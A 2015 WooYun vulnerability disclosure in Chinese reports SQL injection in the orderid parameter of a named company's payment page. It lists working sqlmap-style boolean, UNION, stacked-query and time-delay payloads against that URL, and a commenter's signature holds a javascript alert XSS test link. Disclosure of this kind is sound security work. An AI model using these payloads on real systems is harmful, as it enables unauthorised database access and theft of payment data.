当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099936

漏洞标题:品茗某处存在严重SQL注入漏洞(128个库)

相关厂商:品茗

漏洞作者: 0x 80

提交时间:2015-03-09 17:58

修复时间:2015-04-23 17:58

公开时间:2015-04-23 17:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

严重SQL注入

详细说明:

支付处
http://pay.pinming.cn/orderdetail.aspx?orderid=72b2b66f-44ae-4ba7-a0fd-23d0c8ec3e25
Place: GET
Parameter: orderid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderid=72b2b66f-44ae-4ba7-a0fd-23d0c8ec3e25' AND 7172=7172 AND 'zA
NB'='zANB
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: orderid=72b2b66f-44ae-4ba7-a0fd-23d0c8ec3e25' UNION ALL SELECT NULL
,NULL,NULL,NULL,NULL,NULL,CHAR(58) CHAR(108) CHAR(121) CHAR(122) CHAR(58) CHAR(7
2) CHAR(98) CHAR(74) CHAR(118) CHAR(121) CHAR(109) CHAR(72) CHAR(67) CHAR(104) C
HAR(106) CHAR(58) CHAR(99) CHAR(104) CHAR(113) CHAR(58),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: orderid=72b2b66f-44ae-4ba7-a0fd-23d0c8ec3e25'; WAITFOR DELAY '0:0:5
'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: orderid=72b2b66f-44ae-4ba7-a0fd-23d0c8ec3e25' WAITFOR DELAY '0:0:5'
--
---

漏洞证明:

66.png


http://pay.pinming.cn/orderdetail.aspx?orderid=72b2b66f-44ae-4ba7-a0fd-23d0c8ec3e25

修复方案:

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2015-03-09 21:43 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:125 | <a href=javascrip:alert('xss')>s</a> 点...)

    给你发了个注入,你看看。